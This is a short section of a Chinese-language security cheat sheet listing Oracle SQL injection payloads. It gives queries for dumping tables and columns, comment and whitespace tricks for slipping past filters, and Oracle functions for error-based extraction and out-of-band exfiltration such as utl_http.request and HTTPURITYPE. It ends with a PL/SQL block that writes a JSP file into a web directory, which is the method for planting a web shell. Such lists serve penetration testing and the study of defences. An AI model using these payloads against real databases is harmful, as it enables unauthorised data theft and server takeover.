4.1.7.4. Oracle Payload

4.1.7.4.1. 常见Payload

• dump

  • select * from v$tablespace;

  • select * from user_tables;

  • select column_name from user_tab_columns where table_name = 'table_name';

  • select column_name, data_type from user_tab_columns where table_name = 'table_name';

  • SELECT * FROM ALL_TABLES

• Comment

  • --

  • /**/

• Space

  • 0x00 0x09 0xa-0xd 0x20

• 报错

  • utl_inaddr.get_host_name

  • ctxsys.drithsx.sn

  • ctxsys.CTX_REPORT.TOKEN_TYPE

  • XMLType

  • dbms_xdb_version.checkin

  • dbms_xdb_version.makeversioned

  • dbms_xdb_version.uncheckout

  • dbms_utility.sqlid_to_sqlhash

  • ordsys.ord_dicom.getmappingxpath

  • utl_inaddr.get_host_name

  • utl_inaddr.get_host_address

• OOB

  • utl_http.request

  • utl_inaddr.get_host_address

  • SYS.DBMS_LDAP.INIT

  • HTTPURITYPE

  • HTTP_URITYPE.GETCLOB

• 绕过

  • rawtohex

4.1.7.4.2. 写文件

create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
   isto_file utl_file.file_type;
begin
   isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
   utl_file.put_line(isto_file, '<% out.println("test"); %>');
   utl_file.fflush(isto_file);
   utl_file.fclose(isto_file);
end;